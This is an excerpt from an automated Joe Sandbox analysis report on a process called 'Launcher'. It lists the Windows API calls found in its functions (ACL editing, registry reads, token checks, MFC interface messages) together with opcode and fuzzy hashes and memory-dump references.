                                                                                                                • Instruction Fuzzy Hash: 4841CD35A10208EFDB01DF98C881BADBBF1BF49714F204099E815AB391C7B5AE40DB54
                                                                                                                APIs
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,00000000,00000000,00000000,?,?,?,?,?,00B6C6E4,00000000,00000000), ref: 00B6C83D
                                                                                                                • GetAce.ADVAPI32(?,00000000,?,?,?,?,?,?,00B6C6E4,00000000,00000000), ref: 00B6C854
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?,?,?,?,00B6C6E4,00000000,00000000), ref: 00B6C86C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00B6C6E4,00000000,00000000), ref: 00B6C88F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorInformationLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3635006208-0
                                                                                                                • Opcode ID: ce85cf74fd02700be626569595191541befa10ad883cd4a2eb59fb714035a479
                                                                                                                • Instruction ID: 3506284bd77eedfe5beeab029419b29eed4c3e1a5bcdd7a642d82a60f92a96af
                                                                                                                • Opcode Fuzzy Hash: ce85cf74fd02700be626569595191541befa10ad883cd4a2eb59fb714035a479
                                                                                                                • Instruction Fuzzy Hash: 6411CE71600115ABD720EBA69C85EBFBBECFB44B00B2001A9B949E7180EB38D900C7B0
                                                                                                                APIs
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00B6743B
                                                                                                                • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00B6745D
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00B67496
                                                                                                                • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00B674C9
                                                                                                                • CLSIDFromString.OLE32(00000000,-00000008), ref: 00B67570
                                                                                                                • wcstol.MSVCRT ref: 00B67610
                                                                                                                • wcsrchr.MSVCRT ref: 00B6762C
                                                                                                                • wcstol.MSVCRT ref: 00B67650
                                                                                                                • wsprintfW.USER32 ref: 00B67696
                                                                                                                • wsprintfW.USER32 ref: 00B676B9
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B67743
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B67754
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumwcstolwsprintf$FromOpenQueryStringValuewcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473628064-0
                                                                                                                • Opcode ID: c96079c1efc161d108b3ea347052e61bde25e28c25dbc1ceab75344073b0b533
                                                                                                                • Instruction ID: e186babee2811c467b9b4680c230379b53aa2aa6c477f65cda879fd4f2483131
                                                                                                                • Opcode Fuzzy Hash: c96079c1efc161d108b3ea347052e61bde25e28c25dbc1ceab75344073b0b533
                                                                                                                • Instruction Fuzzy Hash: 8F218C71D482289EEB61DB60CC84BE9B7B8EB14315F1000E9E60EA6150DB78AFC4EF51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B5CEE9
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B5CF05
                                                                                                                • #3297.MFC42U(00000000,00000001,?,00000028), ref: 00B5CF30
                                                                                                                • #2637.MFC42U(00000001,00000000,00000001,?,00000028), ref: 00B5CF39
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2637#3297
                                                                                                                • String ID:
                                                                                                                • API String ID: 837686103-0
                                                                                                                • Opcode ID: c4a3bde595a0a13caf4174176be277d37f79711220bcafcf28c1e45abb7edbe5
                                                                                                                • Instruction ID: 407da9a0ea0a7d82c2707fa054dd41125f836c1d62002918223e5939de9968ec
                                                                                                                • Opcode Fuzzy Hash: c4a3bde595a0a13caf4174176be277d37f79711220bcafcf28c1e45abb7edbe5
                                                                                                                • Instruction Fuzzy Hash: 1DF0FC313403517BF3355A61CC86FE7BF9AFB80752F010061FA059A0C1CBE16C5583A1
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000000,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CAF9
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CB00
                                                                                                                • GetLastError.KERNEL32(?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CB0A
                                                                                                                  • Part of subcall function 00B6CB3B: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00B6CB28,00000000,00000000,?), ref: 00B6CB71
                                                                                                                  • Part of subcall function 00B6CB3B: GetLastError.KERNEL32(?,?,?,00B6CB28,00000000,00000000,?,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CB77
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CB2D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1647960853-0
                                                                                                                • Opcode ID: 5aafcfd31b341ab21d230c1afbb206eb7574c99ce01cafe8834729f0c668c6e4
                                                                                                                • Instruction ID: aff04ea14b209fe00ab6b22d100fbef6f16aa18d21fcdcdda53d8e4cd70db3ad
                                                                                                                • Opcode Fuzzy Hash: 5aafcfd31b341ab21d230c1afbb206eb7574c99ce01cafe8834729f0c668c6e4
                                                                                                                • Instruction Fuzzy Hash: 65F03172600119EBCB109FA59C09AAB7FF8EF95751B144165B989E7210EB38DD4097A0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00B73B00,?,?,00B5B731,00B73998), ref: 00B6F268
                                                                                                                • LeaveCriticalSection.KERNEL32(00B73B00,?,?,00B5B731,00B73998), ref: 00B6F29B
                                                                                                                • SetEvent.KERNEL32(00000000,00B5B731,00B73998), ref: 00B6F32B
                                                                                                                • ResetEvent.KERNEL32 ref: 00B6F337
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3553466030-0
                                                                                                                • Opcode ID: 44d47876a315e82b08d6e33b90b9e6595d8155797ee304f0f3ce253a41ef16eb
                                                                                                                • Instruction ID: a92c381a79c74ca867639a9d90584e0e7ea72918bb139a63312eb83209f807d4
                                                                                                                • Opcode Fuzzy Hash: 44d47876a315e82b08d6e33b90b9e6595d8155797ee304f0f3ce253a41ef16eb
                                                                                                                • Instruction Fuzzy Hash: 10012C356002609BCB049F58FC58D557BE4FB49B027414069E90AE7720CF306A81EF96
                                                                                                                APIs
                                                                                                                • #6330.MFC42U(00000001), ref: 00B5EEC9
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5EEDE
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5EEF2
                                                                                                                • #2634.MFC42U(00000001), ref: 00B5EF13
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2634#6330
                                                                                                                • String ID:
                                                                                                                • API String ID: 3857549013-0
                                                                                                                • Opcode ID: c92f0dddebc36b1ea7c47185abc3a3b8f34c7f1587c53ddba12edc1bdd1e35c1
                                                                                                                • Instruction ID: 3caa57d7d806b40e17d6d26131683ce7e0957d3b4ad851e64eabf2492536f85c
                                                                                                                • Opcode Fuzzy Hash: c92f0dddebc36b1ea7c47185abc3a3b8f34c7f1587c53ddba12edc1bdd1e35c1
                                                                                                                • Instruction Fuzzy Hash: A8F0A0301007487BF63A5632DD89F97BAFADBC3752F510499F52996062CF719D80C720
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E41E
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E436
                                                                                                                  • Part of subcall function 00B5E583: #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E5BE
                                                                                                                  • Part of subcall function 00B5E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E669
                                                                                                                • SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00B5E451
                                                                                                                • #6211.MFC42U(00000000), ref: 00B5E45E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6211$RedrawWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1685024686-0
                                                                                                                • Opcode ID: e78ccb657aaaa11b48c1e22b4e139692f5c597e3702ddcceabf2081eef9456ee
                                                                                                                • Instruction ID: a9a1ab13398d5ed90638ed66c26922954bfeb8622f2e3f51b9c06b7e4b1d253c
                                                                                                                • Opcode Fuzzy Hash: e78ccb657aaaa11b48c1e22b4e139692f5c597e3702ddcceabf2081eef9456ee
                                                                                                                • Instruction Fuzzy Hash: 3FF0C0355045407AE6361736EC1DEDB6EFDEBC6B12F06045CF62E920609F656A41CAB0
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B5C6C5
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C6CC
                                                                                                                  • Part of subcall function 00B5C6F3: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B5C722
                                                                                                                  • Part of subcall function 00B5C6F3: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5C78D
                                                                                                                  • Part of subcall function 00B5C6F3: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5C79D
                                                                                                                  • Part of subcall function 00B5C6F3: #2634.MFC42U(00000001,?,?,?,?), ref: 00B5C7C8
                                                                                                                  • Part of subcall function 00B5C6F3: #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00B5C7D4
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B5C6DF
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5C6E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$MessageSend$#2634Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 1037744270-0
                                                                                                                • Opcode ID: 4446a10e490e3cdcff5412707e7a21099e7dd5f921ed9f603860cfb51f6767cb
                                                                                                                • Instruction ID: 9f52aa3c385057bb725b69aabc068ab064139b67bfbc999a8814c373a5cdf75c
                                                                                                                • Opcode Fuzzy Hash: 4446a10e490e3cdcff5412707e7a21099e7dd5f921ed9f603860cfb51f6767cb
                                                                                                                • Instruction Fuzzy Hash: D8E0A932600210AB8701AFE1AC4998BBB1DEF863523000022FA2A9B102CBB86909C6E0
                                                                                                                APIs
                                                                                                                • #2294.MFC42U(?,0000009E,?), ref: 00B5D907
                                                                                                                • #2294.MFC42U(?,00000076,?,?,0000009E,?), ref: 00B5D918
                                                                                                                • #2294.MFC42U(?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00B5D929
                                                                                                                • #2294.MFC42U(?,0000007E,?,?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00B5D93A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2294
                                                                                                                • String ID:
                                                                                                                • API String ID: 314497554-0
                                                                                                                • Opcode ID: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                                                                • Instruction ID: f8a1c446728ecb66608f904f0b976d8ea37bba04dafa40f69642c7936d4991c1
                                                                                                                • Opcode Fuzzy Hash: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                                                                • Instruction Fuzzy Hash: 7FF06C3160450C7AD710DA60DC02FBAB75DFB46740F444066BA1C99091CBB9F955DFE0
                                                                                                                APIs
                                                                                                                • #2294.MFC42U(?,00000093,?), ref: 00B5CAB4
                                                                                                                • #2294.MFC42U(?,0000008E,?,?,00000093,?), ref: 00B5CAC8
                                                                                                                • #2293.MFC42U(?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00B5CADC
                                                                                                                • #2362.MFC42U(?,00000082,?,?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00B5CAF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2294$#2293#2362
                                                                                                                • String ID:
                                                                                                                • API String ID: 983985581-0
                                                                                                                • Opcode ID: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                                                                • Instruction ID: 0e8db61b4538b7f991da473ea997d7bf625a2f9cc89f84cf37c0a43bb289261a
                                                                                                                • Opcode Fuzzy Hash: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
                                                                                                                • Instruction Fuzzy Hash: 4FF065322405097AD7119A50DC02FEABB9DFB41700F008132BA289A4A1DFB1EA65EBE0
                                                                                                                APIs
                                                                                                                • #2294.MFC42U(?,000000A2,?), ref: 00B60B04
                                                                                                                • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00B60B18
                                                                                                                • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00B60B2C
                                                                                                                • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00B60B3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2294
                                                                                                                • String ID:
                                                                                                                • API String ID: 314497554-0
                                                                                                                • Opcode ID: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                                                                • Instruction ID: 8459cbee2d81ebdf678d6c69f66a4b7fde5bbc712b63271139231bb7b0c9e637
                                                                                                                • Opcode Fuzzy Hash: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
                                                                                                                • Instruction Fuzzy Hash: BAF06C712405097ED7119A61DC06FD5B7ADEB42740F404032BA289D0A1DF71F955EBE0
                                                                                                                APIs
                                                                                                                • #2294.MFC42U(?,000000A2,?), ref: 00B5C634
                                                                                                                • #2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00B5C648
                                                                                                                • #2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00B5C65C
                                                                                                                • #2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00B5C66D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2294
                                                                                                                • String ID:
                                                                                                                • API String ID: 314497554-0
                                                                                                                • Opcode ID: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                                                                • Instruction ID: ddce8fd9efc1e75a646b7ad19f79120988fc6f0fef291535b31ceac1c773b360
                                                                                                                • Opcode Fuzzy Hash: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
                                                                                                                • Instruction Fuzzy Hash: 63F06C71240509BEE7119A51DC07F95B79DEB42740F004032BA289D0A1DB71F955EBF0
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6B467
                                                                                                                • #489.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B478
                                                                                                                • #567.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B492
                                                                                                                • #567.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B4AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567$#489H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3691984168-0
                                                                                                                • Opcode ID: 6edcc52f33b1297309e89d5127ab475353e1ee45bc46fd87484fbe779cd06a64
                                                                                                                • Instruction ID: ae1804612c6fccfd138817a57f42eb996560879e7d2220d1389ea4fa6d39ace6
                                                                                                                • Opcode Fuzzy Hash: 6edcc52f33b1297309e89d5127ab475353e1ee45bc46fd87484fbe779cd06a64
                                                                                                                • Instruction Fuzzy Hash: 7BF0A772A01216DBDB04AF9889013ACB6F0BF45700F5040DDF5947B381CBB85A05CBE5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6FB48: GetModuleHandleW.KERNEL32(00000000), ref: 00B6FB4F
                                                                                                                • __set_app_type.MSVCRT ref: 00B6ED92
                                                                                                                • __p__fmode.MSVCRT ref: 00B6EDA8
                                                                                                                • __p__commode.MSVCRT ref: 00B6EDB6
                                                                                                                • __setusermatherr.MSVCRT ref: 00B6EDD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1632413811-0
                                                                                                                • Opcode ID: ef6491c6f44ed6267545d3872c48cc7e57605af340c90aa7c905e3c8a9e947ac
                                                                                                                • Instruction ID: deef6c19c436340570c57fcaf7aed77bde3c1d9ef1c2a7fccf0513c979509696
                                                                                                                • Opcode Fuzzy Hash: ef6491c6f44ed6267545d3872c48cc7e57605af340c90aa7c905e3c8a9e947ac
                                                                                                                • Instruction Fuzzy Hash: 8DF0F874500302CFC7286B34FC1A5183BE0E706B22B111669E06A872F5CFB989C0DB20
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B5C938
                                                                                                                • #2634.MFC42U(00000000), ref: 00B5C946
                                                                                                                • #6195.MFC42U(00B521A0,00000000), ref: 00B5C952
                                                                                                                • #2634.MFC42U(00000001), ref: 00B5C95B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634$#6195MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2287514142-0
                                                                                                                • Opcode ID: d2b4764fd42d8cb5f5abc8906af76cb14c996ff7389bdc803f781e409d31e696
                                                                                                                • Instruction ID: cbc9ca1df41cecf3d33ad8e82db498b3df1c7385f24b17c8c7d8a93846ff9dc9
                                                                                                                • Opcode Fuzzy Hash: d2b4764fd42d8cb5f5abc8906af76cb14c996ff7389bdc803f781e409d31e696
                                                                                                                • Instruction Fuzzy Hash: 5AE0EC3538031666FA3226206C0AF992A928B81F51F1600E4B7183E1D68FA5998396D5
                                                                                                                APIs
                                                                                                                • #6205.MFC42U(?,00000001,00000001), ref: 00B61AD1
                                                                                                                • #6205.MFC42U(?,00000001,00000001,?,00000001,00000001), ref: 00B61AE1
                                                                                                                • #6211.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00B61AE9
                                                                                                                • #2385.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00B61AF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6205$#2385#6211
                                                                                                                • String ID:
                                                                                                                • API String ID: 1216781411-0
                                                                                                                • Opcode ID: 233459fd0c871a3af7bc4b123d39c0b478dca3feb3f3eb371d064ddc359ff450
                                                                                                                • Instruction ID: f358b68a03ab1c1c5b4cfba181fa92f2004c8cb2b9d7ce193f1bf102d4fdb023
                                                                                                                • Opcode Fuzzy Hash: 233459fd0c871a3af7bc4b123d39c0b478dca3feb3f3eb371d064ddc359ff450
                                                                                                                • Instruction Fuzzy Hash: 39E01DA96102146BCF34EBF588D5CEFB6DDFF443447400855707AD7241DD389D048760
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6B383
                                                                                                                • #324.MFC42U(00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B395
                                                                                                                • #540.MFC42U(00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B3A7
